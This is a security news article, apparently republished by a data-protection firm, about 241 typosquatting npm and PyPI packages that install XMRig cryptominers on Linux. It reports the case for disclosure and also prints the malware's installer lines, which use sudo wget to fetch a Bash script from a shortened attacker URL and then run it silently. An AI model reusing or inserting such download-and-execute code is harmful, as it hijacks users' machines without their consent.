Privacy Ninja

241 npm and PyPI Packages Caught Dropping Linux Cryptominers

241 npm and PyPI Packages Caught Dropping Linux Cryptominers

More than 200 malicious packages have been discovered infiltrating the PyPI and npm open source registries this week.

These packages are largely typosquats of widely used libraries and each one of them downloads a Bash script on Linux systems that run cryptominers.

PyPI, npm flooded with cryptomining packages

Researchers have caught at least 241 malicious npm and PyPI packages that drop cryptominers after infecting Linux machines.

These packages are typosquats of popular open source libraries and commands like Reactargparse, and AIOHTTP, but instead, download and install cryptomining Bash scripts from the threat actor’s server.

Also Read: Exploring the dangers of game scams on children

On Wednesday, software developer and researcher Hauke Lübbers shared coming across “at least 33 projects” on PyPI that all launched XMRig, an open source Monero cryptominer, after infecting a system.

pypi cryptominers
55 typosquats laced with cryptominers flood PyPI (Hauke Lübbers)

While the researcher was in the process of reporting these 33 malicious projects to PyPI admins, he noticed the threat actor began publishing another set of 22 packages with the same malicious payload.

“After I reported them to PyPI, they were quickly deleted – but the malicious actor was still in the process of uploading more packages, and uploaded another 22,” Lübbers tells BleepingComputer.

“The packages targeted Linux systems and installed crypto mining software XMRig,” explains the software engineer.

The Python packages contain the following piece of code that downloads the Bash script from the threat actor’s server via URL shortener.os.system(“sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1”)
os.system(“chmod +x .cmc >/dev/null 2>&1”)
os.system(“./.cmc >/dev/null 2>&1”)

The researcher explains the Bit[.]ly URL redirects to the script hosted on 80.78.25[.]140:8000.

Also Read: Expedited Data Breach Decision: PDPC Guide on Active Enforcement

“This was done by downloading and executing the Bash script from http://80.78.25[.]140:8000/.cmc”

Upon execution, the script notifies the threat actor of the IP address of the compromised host and if the deployment of cryptominers succeeded.

At the time of writing, we observed the IP address was down. But, BleepingComputer was able to obtain a copy of the script and we are able to confirm the researcher’s claims:

Bash script installing cryptominers
Excerpt from Bash script installing cryptominers (BleepingComputer)

The Sonatype security research team that I’m a part of, disclosed another 186 npm typosquatting packages today making contact with the same URL to download the malicious Bash script.

malicious code seen in npm packages
npm packages pull malicious code from the same URL (Sonatype)

It appears that both registries cleared the typosquats fairly quickly from their platforms before these could do more harm to developers.

Despite various security enhancements, like mandating two-factor authentication for critical projects and introducing new features (like Python’s setuptools moving towards replacing, it seems the open source repository’s race against threat actors is only getting even more challenging.

Last week, software security company Checkmarx reported discovering a dozen malicious Python packages performing DDoS attacks on Counter-Strike servers.

Earlier this month, cybersecurity firm CheckPoint outed 10 malicious PyPI packages caught stealing developer credentials.

In July, ReversingLabs researchers disclosed a supply chain attack dubbed IconBurst that once again, exploited typosquatting to infect developers.



Subscribe to our mailing list to get free tips on Data Protection and Data Privacy updates weekly!

Personal Data Protection


We have assisted numerous companies to prepare proper and accurate reports to PDPC to minimise financial penalties.


Click one of our contacts below to chat on WhatsApp

× Chat with us